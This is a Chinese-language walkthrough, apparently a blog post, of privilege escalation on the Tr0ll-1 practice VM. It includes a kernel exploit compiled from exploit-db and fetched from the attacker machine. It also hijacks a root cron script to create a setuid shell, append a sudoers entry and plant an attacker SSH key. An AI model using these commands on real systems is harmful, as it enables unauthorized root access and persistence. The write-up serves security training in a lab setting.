4-Tr0ll-1百个靶机渗透(精写-思路为主)(下)

简介: 4-Tr0ll-1百个靶机渗透(精写-思路为主)(上)

二、提权

1.提权方法1

ssh登录获取bash shell

python -c 'import pty;pty.spawn("/bin/bash")'

内核版本

复制过来

开启网页下载

┌──(root㉿kali)-[~]

└─# cp /usr/share/exploitdb/exploits/linux/local/37292.c ./

┌──(root㉿kali)-[~]

└─# python -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

回到靶机ssh,发现断开了,判断应该是设置了定时任务什么的,不太清楚,只能先提权看看了

重新ssh登录

gcc 37292.c -o muma1
./muma1

又断开了,好恶心。

这个常规方法会被cronb定时执行影响,所以我们要尝试更多可能

2.提权方法2

我们查看cronb日志

find / -name cronlog 2>/dev/null ---查看计划任务日志信息

每间隔2分钟执行一次任务

我倒要看看他执行的是什么文件

find / -name cleaner.py 2>/dev/null ---查看文件在哪儿

清除/tmp下的所有文件,并且推出程序

好家伙每两分钟清除/tmp下的所有文件,并且退出当前tty,

那么肯定比我权限都高,我们就用这个执行脚本获取shell

vim写入不了

我们只能用vi或nano写入

find / -perm -o+w -type f 2> /dev/null | grep /proc -v ---枚举所有可写入和执行权限的文件

find / -writable 2>/dev/null ---枚举所有可写入权限的文件

先注释掉这句

这样我们就不会掉了

我们慢慢写

这里要写入要给python远控的脚本

脚本不能直接展示,因为一些大家dddd,可以私信我们的要

此处省略远控代码注入

拿到shell了!

3.提权方法3

我们ssh上去

python -c 'import pty; pty.spawn("/bin/bash")'

创建root可执行程序,获得root权限

nano /lib/log/cleaner.py

#!/usr/bin/python
import os
import sys
try:
    os.system('cp /bin/sh /tmp/ou')
    os.system('chmod u+s /tmp/ou')
except:
    sys.exit()

断开后重新ssh上去看看

获得bash shell

4.提权方法4

或者编辑脚本以将用户溢出添加到sudoers文件中可以sudo su到root用户:

nano /lib/log/cleaner.py

#!/usr/bin/python
import os
import sys
try:
    os.system('echo "overflow ALL=(ALL) ALL" >> /etc/sudoers')
except:
    sys.exit()

sudo su - root 得到root权限

5.root免密登录的方法

在kali本地root的~/.ssh下写入key

cd ~/.ssh

cat id_rsa.pub

没有生成一个

ssh-keygen

空密码

把rsa的key内容写入进靶机的/root/.ssh/里面

cat id_rsa.pub

登入靶机

注意执行这个shell需要

python -c 'import pty; pty.spawn("/bin/bash")'

nano /lib/log/cleaner.py

#!/usr/bin/python import os import sys try: os.system(mkdir /root/.ssh; chmod 775 .ssh; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQD6jUb2+l9/eqOPZ9fbqx5Q3GMjLeHkxPTzomODJA02yDOzxINVxTVfGey7oae+6CqTJZLobypXXD3sTm3oBUKxZxT7dfKZ09ds1F2GK6MdXXWqLI0FqpBCtbYxO9UNIOD9a26OreHHt5t6/wM4oxf95UqNQDJ1/xAlcXPkpOIUCzBKrRnt59TmJycVAGhyZnyBT6ybgacaQDUoS6ifUzRr5xXTCvDDnSQ0Vu0FepRXf1rB9L7f3gCz7HWEU3AkGVnOEoCwtddaHFPF3r6cO7KzWqwG0aDO4sxdbR0WfLqAoUrI6Vkob0IRkz0ZBkmA7K/Ew2s8E5xH53kRV2fPDa3x1S9/z+nPZDma1yYu4UjoWsIXz5+iYU0dYS8UcolEXFwH4f2zIbvQy1JnTc6NnJ/TDsdUMXmtye5VS36reczIvbbRCTz0k+ZiJAooh2Z53sS4BZQ4Sk3XMokwlDy61JFoDdqflXs3koi+bX05aT+Sc9Pdh2sbNK7WOTqQJyOmceU= root@kali" >> /root/.ssh/authorized_keys) except: sys.exit()

等他计划任务执行

断开了证明执行了

等ssh起来


总结

这里展示了五种提权方法,基本覆盖了常用的内网各种姿势,希望大家学有所成,请不要用于其他渠道。

特别注明:本文章只用于学习交流,不可用来从事违法犯罪活动,如使用者用来从事违法犯罪行为,一切与作者无关。

相关文章
|
1月前
|
安全 网络协议 算法
网络空间安全之一个WH的超前沿全栈技术深入学习之路(8-1):主动信息收集之ping、Nmap 就怕你学成黑客啦!
网络空间安全之一个WH的超前沿全栈技术深入学习之路(8-1):主动信息收集之ping、Nmap 就怕你学成黑客啦!
|
6月前
|
安全 容器 数据安全/隐私保护
CTF本地靶场搭建——静态flag题型的创建
【6月更文挑战第1天】本文介绍了如何在CTF比赛中创建静态flag题型。静态flag是预先设定且不变的,常用于攻防模式或Misc、Crypto等题目中作为验证答案的一部分。创建步骤包括:选择比赛,新建题目,设置题目类型和内容,上传附件,添加静态flag,启用题目。选手则需下载附件,解密或解决问题后提交静态flag进行验证。
|
2月前
|
NoSQL PHP Redis
SSRF一篇文章实战举例全面学懂
SSRF一篇文章实战举例全面学懂
51 0
|
7月前
|
安全 网络安全 PHP
Pikachu 目录遍历通关解析
Pikachu 目录遍历通关解析
|
SQL 缓存 网络协议
网络信息安全实验 — 网络攻击技术实验(Kali系统,John、lc7、arpspoof、ettercap、SQL注入...)
本人深感网络安全实验有点麻烦,花了一个晚上弄了部分,特此将笔记贡献造福后人,个人能力有限,还会继续更新。。。 汇报题目:**15分钟教你用 Python 写一个 arpspoof**(课件准备ing,如果弄完后续补上) 第一次网络安全实验(密码学)也是我做的,这里先放个自制工具:[Java实现密码学工具,集成了对称加密算法DES,AES,IDEA,公开加密算法RSA,ECC,散列算法MD5,SHA1,CRC32,以及RSA,DSA,ECDSA数字签名验证示例。](https://blog.csdn.net/weixin_43734095/article/details/105303562)
1474 0
网络信息安全实验 — 网络攻击技术实验(Kali系统,John、lc7、arpspoof、ettercap、SQL注入...)
|
安全 关系型数据库 MySQL
DC-1靶机渗透(教程以及思路)
DC-1靶机渗透(教程以及思路)
150 0
|
安全 网络安全 数据安全/隐私保护
网络安全实验十二 window 2003 Shift后门实验
网络安全实验十二 window 2003 Shift后门实验
160 1
|
监控 网络协议 安全
eve-ng中模拟飞塔HA测试实验及理论
eve-ng中模拟飞塔HA测试实验及理论
406 1
eve-ng中模拟飞塔HA测试实验及理论
|
Shell API 数据库
综合扫描工具 -- recon-ng(v5.0.1)
综合扫描工具 -- recon-ng(v5.0.1)
198 0
综合扫描工具 -- recon-ng(v5.0.1)
|
安全 数据安全/隐私保护
【BP靶场portswigger-服务端3】目录遍历漏洞-6个实验(全)(上)
【BP靶场portswigger-服务端3】目录遍历漏洞-6个实验(全)(上)
315 0
【BP靶场portswigger-服务端3】目录遍历漏洞-6个实验(全)(上)